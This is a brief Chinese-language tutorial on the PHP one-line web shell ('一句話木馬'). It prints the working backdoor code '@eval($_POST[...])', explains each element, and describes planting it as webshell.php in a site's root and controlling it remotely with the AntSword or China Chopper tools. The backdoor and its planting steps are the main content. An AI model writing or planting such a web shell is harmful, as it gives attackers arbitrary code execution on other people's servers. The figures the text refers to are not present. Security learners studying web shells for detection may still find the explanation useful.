<?php @eval($_POST['meng']); ?>
說明:
@:錯誤控制符,即使出現錯誤,也無視出現的錯誤信息,繼續執行下邊的代碼。
eval()函數:把字符串按照PHP 代碼來計算。該字符串必須是合法的PHP代碼,且必須以分號結尾。
meng:名稱可以隨便定義,是接收菜刀或蟻劍通過 POST 方式發送過來的代碼數據,也可稱為菜刀或蟻劍連接一句話木馬的密碼。
(說的簡單點,就是PHP任意代碼執行,看下面的示例很容易就明白了。)
示例1:在網站根目錄創建webshell.php文件並寫入一句話木馬,然后訪問。如圖所示對一句話木馬的利用。
示例2:使用蟻劍連接webshell.php
